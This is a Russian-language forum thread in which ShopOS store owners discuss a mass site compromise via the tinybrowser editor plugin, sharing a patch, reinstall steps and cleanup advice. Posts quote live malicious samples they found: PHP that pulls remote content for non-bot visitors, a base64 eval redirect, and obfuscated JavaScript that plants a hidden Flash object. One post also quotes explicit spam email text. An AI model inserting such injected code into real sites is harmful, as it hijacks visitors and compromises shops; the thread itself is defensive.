Категории

Важно! По безопасности!

Как быстрый костыль

Открыть
admin\includes\javascript\tiny_mce\plugins\tinybrowser\config_tinybrowser.php

Заменить

$_config = dirname(dirname(dirname(dirname(dirname((dirname(dirname(__FILE__)))))))).'/config.php';

на

$_config = dirname(dirname(dirname(dirname(dirname((dirname(dirname(__FILE__)))))))).'/includes/top.php';

Ниже заменить

//$tinybrowser['sessioncheck'] = 'authenticated_user';

на

$tinybrowser['sessioncheck'] = 'auth_user';

В файле admin\includes\top.php
В самом низу, ПЕРЕД ?>
вставить

if (!isset($_SESSION['auth_user']))
{
$_SESSION['auth_user'] = 'yes';
}

ну и на выходе убивать сессию
в файле logoff.php, ниже строки

unset ($_SESSION['cc_id']);

добавить

unset ($_SESSION['auth_user']);

После входа сессия с auth_user не создается. создается только после перехода в админку.

Не понятно было почему не работает сессия там. Потом вспомнил, что шопос приписывает сессиям sess_тут_id_сессии. По этому просто заинклудил includes/top.php

У меня вроде работает корректно.

Если сделал что-то не правильно, то извиняйте. Как получилось.

Второе
Заглядывайте почаще в папки на сервере и ищите файлы подобные этому a14202d.php.25319. Особенно в папке images. Вид не обязательно может быть именно таким. Может быть название файла image_3w234_.php.324 или что-то подобное.
Их нужно удалять, так как через них можно полностью управлять и сайтом и файлами и всем что там есть!

Третье
Просматривайте файлы index.php, admin/index.php на наличие изменения даты. Если дата другая чем у остальных файлов, то проверяйте и чистите код.
Так же могут быть заражены и файлы account.php, product_info.php, includes/bottom.php....
В этих файлах находил сторонние коды
Примеры "левого" кода

<?php setCookie ("act","1",time()+3600*24*365,"/"); ?>

<?php
if(@$_COOKIE['act']!=1){
$u4ain=@file_get_contents ("http://......./lnk.php?c=utf&s=");
echo $u4ain;
}
if(@$_COOKIE['act']!=1){
if(getenv('HTTP_REFERER')!=""&&!stristr(getenv('HTTP_USER_AGENT'),"bot")&&!stristr(getenv('HTTP_USER_AGENT'),"google")&&!stristr(getenv('HTTP_USER_AGENT'),"yandex")){
$u4ain=@file_get_contents ("http://......./test.php");
echo $u4ain;
}
}
?>

Четвертое

У тех, у кого под блоками везде в шаблоне выскакивает 404 - not found или тормозит сай, когда ранее такого не было
В файле includes\lib\smarty\smarty.class.php
Есть вредоносный код.
А именно

if(@$_COOKIE['act']!=1){
$u4ain=@file_get_contents ("http://....../lnk.php?c=utf&s=ВАШ_ДОМЕН_ТУТ");
$_smarty_results.=$u4ain;
}
if(@$_COOKIE['act']!=1){
if(getenv('HTTP_REFERER')!=""&&!stristr(getenv('HTTP_USER_AGENT'),"bot")&&!stristr(getenv('HTTP_USER_AGENT'),"google")&&!stristr(getenv('HTTP_USER_AGENT'),"yandex")){
$u4ain=@file_get_contents ("http://...../test.php");
$_smarty_results.=$u4ain;
}
}

или что-то похожее.

Как я понял вихаю гадости куда попало, главное, подальше от глаз.
Если просмотрели все, но тормоза остались или яшя так же пишет, что есть вирус или еще что-то - сносим полностью скрипт оставляя только БД и заливаем новый подстраивая конфиг.

Переустановить все просто
Оставляем файл config.php, папки media, images, оставляя плагины и что там вы еще правили.
Остальное перезаливаем полностью.
То, что оставили config.php, папки media, images, оставляя плагины... так же проверяем досконально на наличие левого кода.
левый код найти просто - сравнить размеры файлов оригинальных файлов и своих на сервере. если отличается, то там что-то левое есть.

Процесс обновления
1 - делаем полный бекап сайта и базы. (день бекапа вроде седня, поздравляю )
2 - удаляем все файлы и папки кроме: images, media, themes, config.php (вроде ничего не забыл)
3 - проверяем папочки и файл config.php на наличие левых файлов и кодов(чтобы быть уверенными, что ничего не осталось)
4 - берем чистый шопос(можно сразу с моим обновлением) и копируем от туда в корень все файлы и папки которых не достает
5 - выставляем права как было ранее(папка tmp, admin/backup и т.д..) 777(права на чтение\запись)
6 - ставим фикс из этого топика который выше, чтобы сразу перекрыть доступ.
как-то так.

Или скачиваем обновление из темы http://www.shopos.ru/forum/index.php?topic=6560.0

.

Все работает. Если у вас с первого раза пишет "Вам требуется разрешение для просмотра этой страницы." попробуйте закрыть браузер и снова авторизоваться.
У меня только с 3 раза все встало на места.

Спасибо Nebox.

Пожалуйста.

Обновил правочку в includes/top.php

Администраторы магазинов!
Заглядывайте почаще в папки на сервере и ищите файлы подобные этому a14202d.php.25319. Особенно в папке images.
Их нужно удалять, так как через них можно полностью управлять и сайтом и файлами и всем что там есть!

нашел у себя в одном сайте a19737d.php.5055 , спасибо.

У меня сразу все заработало, спасибо NeBox.

дополнено

Обновлено. Добавлен 4 пунк. Читать всем и проверять всем!
Для большей безопасности вообще снести admin\includes\javascript\tiny_mce\plugins\tinybrowser

NeBox'y, отдельное огромное спасибо!

Прям какая-то атака на все магазины на шопосе...

И еще глупый вопрос, за что этот плагин (tinybrowser) отвечает, т.е. если удалю как это повлияет на работу в админке?

Пожалуйста!

не сможете картинки загружать в новости, статьи и т.д...

Прям какая-то атака на все магазины на шопосе...

именно. уже вон куда забрались. в класс шаблонизатора.
по этому всем нужно в срочном порядке делать обновления и проверки и ставить фикс для редактора, либо сносить его.

завтра выложу поправленный плагин для контроля файлов. можно будет легко находить измененные файлы.
Хотя сейчас он есть, но сырой и делался давно да еще и xtc версии
http://www.shopos.ru/forum/index.php?topic=3981.msg20485#msg20485

Но он будет работать если файлы почистить сначала.
Т.е. ему нужно сделать сначала как бы снимок того что есть, а потом уже проверять на изменения, если они были. так что тем у кого уже проблемы или хочет проверить на изменения - данный плагин будет бесполезен.

Но это всё последствия. Неплохо бы найти причину... Как это можно сделать?

Фикс в первом топике для причины.

Да что-то мне нравиться теперь этот двиг все меньше и меньше.
Удаляю уже каждый день всякую дрянь и все равно пробивают.
Причем смотрю и у знакомых такие же проблемы, но сюда никто не пишет тех подержка тут сдохла уже как пол года. Если б не Вы товарищи Мартин и NeBox то можно сказать она бы вообще отсутствовала. Короче жаль, был хороший двиг пока не продали

Вот что теперь делать?
Когда почвилась такая хрень
Важно! По безопасности!

Вот тоже, 12 сайтов почистил все ок, а вот этот сайт не как не разблокируют =(

И меня яндекс никак не разблокирует, хотя у меня на момент бана вирусов не было...
Заявку на перепроверку уже дважды отправлял - толку никакого...

Ребята, если у кого стал тормозить сайт - проделайте 4 пункт из первого топика!
а лучше полностью переустановить скрипт! Именно скрипт, не базу!

как правильней переустановить чтоб избавиться? Как понимаю примерно так:
1. Заходим на ФТП удаляем все кроме папки images и themes чтобы сохранить картинки и тему
2. Заливаем новый скачанный отсюда только не закачиваем папки migrates и install
3. После этого заходим в магазин он скорей всего выдаст поправить config.php, попровляем config.php
4. Все базу не чистим, просматриваем папки images и themes и если там ничего зловредного нет, работаем на чистом.
Делать так?

Похоже дырка конкретная есть. Не миновала и меня участь быть взломаным. В admin/includes обнаружил файлик посторонний upkk.php вот с таким содержимым:

));
}
?>

И еще файлик в admin/includes/javascript под названием json.js с дописанным в конце iframeом

От греха удалил еще liveinternetовский счетчик с главной. Ругался антивирь на него. Не стал в коде разбираться. Может быть что-то и там поменяли.

Сайт тормозил. После удаления лишнего полный порядок.

Если сайт еще не заражен. Вроде... Ттт...
То:
"Быстрый костыль" достаточен для предотвращения проникновения вируса?

Или нужно

снести admin\includes\javascript\tiny_mce\plugins\tinybrowser

? И будет ли этого достаточно?

Должно хватить. более дыр не найдено вроде. А что там кулхацкеры находят - не известно)

Nebox, а в моем случае костыль поможет? Я не очень понял, что делает код из файла upkk.php. Вроде как при каком-то условии создается папка kk с полным доступом. Сведущие люди подскажите.

Да. поудаляйте левые файлы и поставьте хак.
Проверьте все файлы, что описаны в начале темы.

я удалил все уже как написано и все равно яндекс что-то недоволен. Интересно сколько теперь ждать? Может перезалить полностью скрипт?

Может что-то осталось просто. Не всегда просто найти.
Перезайлейте.

Процесс обновления

1 - делаем полный бекап сайта и базы. (день бекапа вроде седня, поздравляю ;) )
2 - удаляем все файлы и папки кроме: images, media, themes, config.php (вроде ничего не забыл)
3 - проверяем папочки и файл config.php на наличие левых файлов и кодов(чтобы быть уверенными, что ничего не осталось)
4 - берем чистый шопос(можно сразу с моим обновлением) и копируем от туда в корень все файлы и папки которых не достает
5 - выставляем права как было ранее(папка tmp, admin/backup и т.д..) 777(права на чтение\запись)
6 - ставим фикс из первого топика этой темы, чтобы сразу перекрыть доступ.
как-то так.

Проверил еще раз. Как в вашем случае файлов не обнаружил.

я удалил все уже как написано и все равно яндекс что-то недоволен. Интересно сколько теперь ждать?

у меня та же ситуация... жду и не дождусь, когда уже яндекс разбанит...

Может перезалить полностью скрипт?

а поможет ли?
как перезальете, расскажите об своем успехе...

... жду и не дождусь, когда уже яндекс разбанит...

Вне зависимости от перезаливки, Яндекс разбанит только после проверки сайта.

А что мешает проверить сайт на вирусы online? Например, https://www.virustotal.com/
Как говорится, одно мнение хорошо, но и второе не помешает... Яндекс очень предвзятый поисковик касаемо интернет магазинов.

Мне вот стало чисто интересно, каким образом внедряется код. Установленные средства антивируса, файрволы и прочие прочие средства безопасности не обнаруживают код на стадии внедрения? Не может же он материализоваться ни с того ни с сего сам по себе! Утилиты м.б. какие то ставятся? Ну уж ни с сервера на котором скрипт крутится по сайтам же ходит народ, всяко от клиентов получается? Не уж то код такой не заметный при внедрении и умный, что сам внедряется без каких-либо телодвижений пользователя.

P.s. тьфу, тьфу, тьфу, пронеси...

Причем тут антивирусы и умный код? Код внедряется скриптами, на автомате скорее всего, ищет какие-то файлы определенные и правит их. Если есть доступ к файлам, то там дело это не хитрое.
Тут нужно права выставлять правильные и на папки и на файлы, чисто для чтения. на нужные папки, типа tmp, img и т.д... ставить уже чтение\запись. иначе картинки не загрузить и сессии не сохранить.

да, тоже пострадал от этого вируса, перезалил скрипты, поставил заплатку, яндекс уже 5 дней репу чешит, из-за него деньги теряю!!!

все сделал, как написано, а вылезло

26/03/2012 12:03:17 | 1054 - Unknown column 'cc_cvv' in 'field list' | select customers_name,
customers_cid,
customers_id,
customers_vat_id,
customers_company,
customers_street_address,
customers_suburb,
customers_city,
customers_postcode,
customers_state,
customers_country,
customers_telephone,
customers_email_address,
customers_address_format_id,
delivery_name,
delivery_company,
delivery_street_address,
delivery_suburb,
delivery_city,
delivery_postcode,
delivery_state,
delivery_country,
delivery_address_format_id,
billing_name,
billing_company,
billing_street_address,
billing_suburb,
billing_city,
billing_postcode,
billing_state,
billing_country,
billing_address_format_id,
payment_method,
payment_class,
shipping_class,
cc_type,
cc_owner,
cc_number,
cc_expires,
cc_cvv,
comments,
currency,
currency_value,
date_purchased,
orders_status,
last_modified,
orig_reference,
login_reference,
customers_status,
customers_status_name,
customers_status_image,
customers_ip,
language,
customers_status_discount
from os_orders where
orders_id = '112' | /admin/orders.php?page=1&oID=112&action=edit

Что это значит??? И ка кисправить?

Тоже обнаружил у себя вредоносный код в файле config.php сразу после <?php.
Так что не обязательно все это может быть в конце файла или скрипта.

YanXP79, ваша ошибка некоим образом не касается фикса из первого топика.
у вас ругается на поле в таблице в бд cc_cvv. что оно запрашивается, а там его нет. Видимо что-то ставили или наоборот удалили, так как cc_cvv должно быть в таблице os_orders.

Ага. Может быть где угодно. И в начале, и в середине и в конце. По этому желательно сравнивать файлы с оригиналами, если самому не получается найти.

Вроде после установки фикса проблем не возникает более?
.

у вас ругается на поле в таблице в бд cc_cvv. что оно запрашивается, а там его нет. Видимо что-то ставили или наоборот удалили, так как cc_cvv должно быть в таблице os_orders.

А как можно добавить эту строчку с cc_cvv???

В старой базе увидел колонку с названием cc_cvv. А как переместить??? Или добавить???

Пытаюсь сделать импорт столбца os_orders со старой базы, пишет:

Ответ MySQL: Документация
#1054 - Unknown column 'cc_cvv' in 'field list'

Понимаю, что пишет, мол неизвестная колонка. А как её импортировать то???

делаю mysql запросы, чтобы добавить столбец 'cc_cvv' и ничего не получается. Как правильно добавлять???

после

`cc_issue` varchar(3) default NULL,

нужно добавить

`cc_cvv` varchar(4) default NULL,

Полдня страдаю, понять не могу как это сделать?!

Решил проблему, написав

ALTER TABLE `os_orders` ADD `cc_cvv` VARCHAR(4).

Чего не добавлялось, не понятно. :)

);

После входа сессия с auth_user не создается. создается только после перехода в админку.
.............

а где этот logoff.php ????

);

После входа сессия с auth_user не создается. создается только после перехода в админку.
.............

а где этот logoff.php ??? ?

Смотрите корень сайта!

лучше обновится http://www.shopos.ru/forum/index.php?topic=6560.0

Сегодня вырубили очередной мой сайт, написал супорту, в ответ

Здравствуйте!

Ваша площадка была заблокирована за несанкционированную эл. рассылку, которая велась с Вашего аккаунта. Всего с Вашего аккаунта была отправлено около 20000 подобных писем. Если Вы согласны устранить данную рассылку с сайта, то мы вновь разблокируем доступ на площадку.

Пример эл. письма из рассылки: Will you take your tour into shaggy vaginal and anal tunnels of fascinating blonde queen, who is obsessed with fishnet lingerie?! Trying to save sexuality and sensuality of her boobs, white slut with brilliant smile always puts on something semi-transparent, which will work as the teaser for the big cocks! After putting her back on the bed and raising legs fucking high, short thick stick hit her ass and pussy that are really close to each other. If you are willing to fuck some vagina then pull your cock a bit higher and make it go in without stopping. However if you are possessed with tough digging, then put your cock slightly lower and push it in with the maximum power that you have! Everything goes smooth, except pleasant smile on the face of blonde foxy. That fucking smile makes everyone believe that she is not cared about what is drilling her holes. However she really likes being fucked like never before!

>:(

Заметил,что приблизительно 20 марта - в примерный день заражения вирусом,на сайте у меня зарегистрировалось около пяти "мутных покупателей",то есть вместо имён,фамилий и адресов были указаны подозрительные ссылки и коды.
Не знаю,связано ли это с вирусом ,но это наводит на определенные подозрения.
Ссылки и коды я удалил.

Смотрите корень сайта!

Спасибо... Слепну, наверное... :)

Сегодня нашел в папке cache одну паку, название fu ;D ,
Как же эти п**** надоели.

и еще в папке cache/system было 1.php

Сегодня вырубили очередной мой сайт, написал супорту, в ответ

А меня Яндекс наконец то разбанил...
Ждать перепроверки пришлось 10 дней...

Здравствуйте.
Подскажите, как узнать, что обновление установилось?
Все делала по инструкциям. Номер версии не изменился (2.5.9)
Лицензия

номер меняться и не должен.
закачали файлы в папку - обновление и применилось

У меня вообще выдает, что сайт заражен трояном...посмотрел на сервере изменены все яваскриптовые файлы...что делать? у меня вообще еще версия 2.5.8 стоит...
PS... кто в теме...предлагают решить проблему на платной основе...магаз рабочий..потеря времени..потеря денег

все сделал. Все работает, спасибо. Но очень не удобно что нельзя картинку вставить не на одной информационной странице сайта. Есть какое-то решение???

Конечно есть. http://www.shopos.ru/forum/index.php?topic=6560.0
установить обновление 2.5.9.2

Хотя картинка должна вставляться нормально и со старым редакторов и фиксом.

поймал вирус на сайт, удалил всё файлы кроме config.php, папки media, images и themes проблема пропала, но сейчас грузится только главная страница и админка. Ни в какой товар зайти не могу пишет
The requested URL /zapchasti-dlja-stiralnih-mashin.html was not found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

что делать подскажите пожалуйста.

А что ж Вы ожидали после удаления большинства файлов? Что все будет работать?

Конкретно указанные ошибки возникают, скорее всего, из-за отсутствия .htaccess.

У вас из за чпу не работает, включите плагин чпу и удалите все чпу ссылки, а патом обратно!

Сделал все процедуры как написано в первом топике, вроде все почистил.
Однако появилась проблема - на сайте с задержкой (примерно 15 - 20 мин.) отображаются изменения внесенные в базу данных. Например хочу изменить название какого-либо товара или цену или картинку. В тоже время изменения вносимые в скрипт отображаются сразу.
Может у кого есть похожая проблема?
Как решить?

Реально прошел час с момента изменения. по всей видимости нет связи с базой данных. :(

Ухищрения с заплатками не дали действенного результата сегодня обнаружил повторное заражение. На этот раз выскакивала ошибка под блоками. Вылечилось заменой smarty.class.php . Что странно дата создания не была изменена. Просто отличался размером. Код из первого поста обнаружен не был. Склоняюсь уже к мысли, что зря купил движок. Надо на что-то более безопасное переходить.

Надо на что-то более безопасное переходить.

Похоже проект умирает.. Серьезных обновлений не было давно, вот и находят всякие дырки.

Дырки не только в шопосе, а во всех скриптах которые использовали редактор tiny_mce с плагином tinybrowser

Вообще, чтобы быть уверенным, что результата не дало, нужно провести анализ логов и выяснить кто к каким файлам обращался.
Возможно код был внедрен ранее. И что значит безопаснее? Одна дыра а крику.... Тем более, что решение уже есть и оно действенное.

Лучше переустанавливать. Кто знает что и в какие файлы еще напихали.

вот еще в config.php бывает, недавно у себя обнаружил

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsKaWYgKCFzdHJpc3RyKCR1YWcsIk1TSUUgNy4wIikpewppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3IgcHJlZ19tYXRjaCgiL3lhbmRleFwucnVcL3lhbmRzZWFyY2hcPyguKj8pXCZsclw9LyIsJHJlZmVyZXIpIG9yIHByZWdfbWF0Y2ggKCIvZ29vZ2xlXC4oLio/KVwvdXJsXD9zYS8iLCRyZWZlcmVyKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJteXNwYWNlLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImZhY2Vib29rLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFvbC5jb20iKSkgew0KaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsNCmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9taW5rb2Yuc2VsbGNsYXNzaWNzLmNvbS8iKTsNCmV4aXQoKTsNCn0KfQp9DQp9DQp9"));

Если установил движок магазина сразу по ссылке на версию 2.5.9.2FREE, то больше ничего обновлять не надо? Дата создания основных папок указана 26.03.2012. В админке пишет, что версия 2.5.9

больше ничего делать не нужно будет. в архивах все правки уже есть.
версию и будет писать 2.5.9.

Кстати, ограниченый доступ к админке никто не отменял:

.htaccess

Order allow,deny
Allow from 127.0.0.1
Allow from ip_admina // Заменить на свои
Allow from ip_admina
Allow from ip_admina
Allow from ip_admina
Allow from ip_admina
Allow from 172.16.0.0/16

У меня в Вебмастере Гугла Сканирование/ошибки сканирования есть ссылки с ошибкой 403 зашел ради интереса на них вид(http://мойсайт.ru/index.php?page=social_send&social=23&url=http://tabakest.ru/starbuzz-kola.html&title=Starbuzz%20%D0%9A%D0%BE%D0%BB%D0%B0) перебрасывает на другой сайт по ФТП рыскал нечего не нашел.

обнаружил у себя вредоносный код в папке image, эх. некая массовая рассылка. может CHMOD можно на какие-то папки понизить? все стоит по рекомендациям по файлу readme

Усем привет!
Не знала, куда написать, отдельной темы общей по вирусам не нашла, пишу в эту:))))))

С недавних пор стала проявляться некоторая воспроизводимая "Псевдовирусня" или реальная Вирусня, просто не знаю как еще назвать этого зверя. Воспроизводилась только под IE, при обращении к сайту без www, с антивирусом AVP. В других браузерах Opera, Mozila не вопроизводилась. Доктор Веб молчал, Яндекс на вирусы на сайте не жаловался.
Проявления при обращении к сайту без www и под IE с антивирусом AVP происходило следующее: AVP сообщал URL-адрес: http://xatyta.pp.ua/crossdomain.xml База подозрительных веб-адресов: доступ заблокирован.
На помощь воспользовалась приложением айболит, удалила два сторонних скрипта прописанных в директориях:
1. /media/icons/icons_browser/photos.js - (photos.js) - был удален
2. /media/icons/icons_engine/vote.js - (vote.js) - был удален
Оба файла были с датами старыми, которые были такие как и у остальных с заливкой общей папки. Айболит же показал, что залиты они были реально намного позднее. Так, что по датам не всегда понять можно, когда поселился зверь. Код скрипта такой:
function addNewObject () {
try {
var ua = navigator.userAgent.toLowerCase();
if ((ua.indexOf("chrome") == -1 && ua.indexOf("win") != -1) && navigator.javaEnabled()) {
var GaDgDaSLx=;var counter = GaDgDaSLx](-88-26+22+108,48+14-31) + GaDgDaSLx](18-8,97-96);
var div = document.createElement('div');
div.innerHTML = '<object id="dummy" name="dummy" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="1" height="1">';
div.innerHTML += '<param name="allowScriptAccess" value="always" \/>';
div.innerHTML += '<param name="movie" value="'+ counter +'" \/>';
div.innerHTML += '<embed id="dummy2" name="dummy2" src="'+ counter +'" width="1" height="1" name="flash" allowScriptAccess="always" type="application\/x-shockwave-flash" \/>';
div.innerHTML += '<\/object>';
div.style.position = 'absolute';
div.style.left = '-100px';
div.style.top = '-100px';
document.body.insertBefore(div, document.body.children);
}
} catch (e) {
if (document.body == undefined || document.body.children == undefined) {
setTimeout('addNewObject()', 50);
}
}
}
addNewObject();

Источник